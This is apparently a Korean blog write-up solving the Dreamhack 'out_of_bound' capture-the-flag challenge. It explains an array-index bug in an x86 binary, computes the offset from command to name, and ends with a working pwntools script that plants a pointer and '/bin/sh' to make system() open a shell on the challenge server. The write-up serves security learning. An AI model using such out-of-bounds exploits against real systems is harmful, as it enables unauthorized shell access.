out_of_bound

 

---

out_of_bound

문제 풀이

배열의 정해진 인덱스를 넘는 Out of bound 문제로써
x86..으로 Canary와 NX가 존재하네요

name[16]와 command의 문자 배열을 담은 배열이 존재합니다.
main이 중심이니까 확인해보시면 name을 입력 받는데 후에 idx를 입력 후 system에 command의 배열에
넣어주는 모습을 보니까 확실히 oob 문제인 듯하네요 결국 우리가 실행할 함수는 

system("/bin/sh")이므로 command에는 "/bin/sh"가 없으므로 idx의 값을 활용해
command의 10을 넘어서 코드를 작동한다는 점입니다

---

Exploit 설계

name 변수가 설정 후 command의 변수가 설정되므로 name변수가 스택의 위치를 확인해봐요
스택은 쌓이기 때문에 아마 더 높은 변수에 존재할 가능성이 있죠 그럼 10보다 큰 값을 적당히 넣는다면
언젠간 name의 변수에 닿고 name에 "/bin/sh"를 입력하여 그 값을 넣는다면?

그럼 command와 name 사이의 거리만 구하면 exploit code가 작동되겠네요
그럼 바로 시작해볼까요?

---

Exploit

name과 command의 주소를 알아봐야하므로 이전 C코드를 확인하면서 disas합시다
read에 넣은 값은 name에 있기에 main+66으로 넣으면.. 
또한 command는 scanf로 받은 위치를 참고하면(인자를 생각하면서 하면)

name address : 0x804a0ac

command address : 0x804a060

76.. 우리는 x86이므로 4byte로 나눈다면 76/4 = 18 obb할거면 1더해야하니까 19로 적어야합니다

from pwn import *
 
p = remote("host3.dreamhack.games", 18131)
 
name_address = 0x0804A0AC + 4
name = p32(name_address) + b"/bin/sh"
 
p.sendafter("Admin name: ", name)
p.sendlineafter("What do you want?: ", str(19))
 
p.interactive()
 

 

---

참고 자료

 

참고 이미지